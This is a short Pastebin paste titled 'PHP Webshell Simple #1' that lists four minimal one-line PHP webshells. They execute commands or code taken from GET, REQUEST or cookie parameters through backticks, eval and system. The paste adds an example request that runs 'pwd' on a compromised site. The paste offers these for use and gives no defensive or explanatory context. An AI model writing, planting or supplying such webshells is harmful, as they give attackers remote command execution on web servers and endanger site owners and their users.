Advertisement
shamp0erna99

PHP Webshell Simple #1

Feb 4th, 2021
318
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.21 KB | None | 0 0
  1. Best PHP Webshell shortest:
  2. 1. <?=`$_GET[1]`?>
  3. 2. <? eval($_GET[1]);?>
  4. 3. <? system($_REQUEST[1]);?>
  5. 4. <?=`$_COOKIE[0]`?>
  6.  
  7. Ex: site.com/x.php?1=pwd
  8. More information CyberNews : https://www.local-hunter.com/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement